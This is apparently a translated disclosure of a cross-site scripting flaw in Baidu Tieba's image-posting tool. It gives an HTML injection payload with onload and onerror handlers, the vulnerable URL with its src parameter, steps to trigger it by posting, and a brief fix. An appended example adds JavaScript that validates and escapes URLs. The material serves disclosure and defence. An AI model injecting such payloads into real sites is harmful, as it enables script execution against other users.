XSS vulnerability in the upload feature of the Tieba image-posting tool (贴图神器)
1. First, construct the code: "><img class="BDE_Smiley" src=http://up.2cto测试数据/2013/0810/20130810112854130.png" pic_ext="png" width="30" height="30" onload="alert(1)"><img src="#" pic_ext="jpeg" onerror="$(".pic_src_wrapper").css("display","none")"><a
3. http://tieba.baidu测试数据/photo/shenqi?title=&src=http%3A%2F%2FHdhCmsTestbaidu测试数据%2Fp%2F%25E5%258D%2596%25E8%2590%258C%25E7%259A%2584%25E4%25B8%25AD%25E4%25BA%258C%3Ffrom%3Dsuper&pic[0]=http%3A%2F%2Fhimg.bdimg测试数据%2Fsys%2Fportrait%2Fitem%2Fc22ce58d96e8908ce79a84e4b8ade4ba8c0334.jpg
(This is the address of the Tieba tool.)
4. Place the constructed code after the link in &src=
5. This yields:
&pic[0]=http%3A%2F%2Fhimg.bdimg测试数据%2Fsys%2Fportrait%2Fitem%2Fc22ce58d96e8908ce79a84e4b8ade4ba8c0334.jpg
6. Then reply or post a new thread, and the XSS is triggered.
Fix:
Filter the "\" symbol
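
The payload in step 1 starts with "> so that it closes an attribute value and the enclosing tag. The following is an added example, not Baidu's code and not part of the original write-up, showing a raw concatenation next to a version that validates the URL and encodes it for the attribute context. It assumes the src parameter is written into a double-quoted HTML attribute; the function names, the src-link class and the sample input are hypothetical.

```javascript
// Added example (not Baidu's code). Assumption: the page writes the `src`
// query parameter into a double-quoted HTML attribute.

// Encode every character that can end an attribute value or open a tag.
function escapeAttr(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;', '`': '&#96;' };
  return String(value).replace(/[&<>"'`]/g, (c) => map[c]);
}

// Accept only absolute http(s) URLs; anything else is rejected.
function safeHttpUrl(value) {
  try {
    const u = new URL(value);
    return (u.protocol === 'http:' || u.protocol === 'https:') ? u.href : null;
  } catch (_) {
    return null;
  }
}

// Before: raw concatenation, so `">` closes the attribute and the tag.
function renderSourceLinkUnsafe(src) {
  return '<a class="src-link" href="' + src + '">source</a>';
}

// After: validate the URL first, then encode it for the attribute context.
function renderSourceLink(src) {
  const url = safeHttpUrl(src);
  if (url === null) return '<span class="src-link">source unavailable</span>';
  return '<a class="src-link" href="' + escapeAttr(url) + '">source</a>';
}

// Constructed input shaped like the page's payload: a URL followed by `">` and a tag.
const sample = 'http://example.com/p/1"><img src="#" onerror="alert(1)">';
console.log(renderSourceLinkUnsafe(sample)); // markup contains an injected <img> element
console.log(renderSourceLink(sample));       // a single <a> element, nothing injected
```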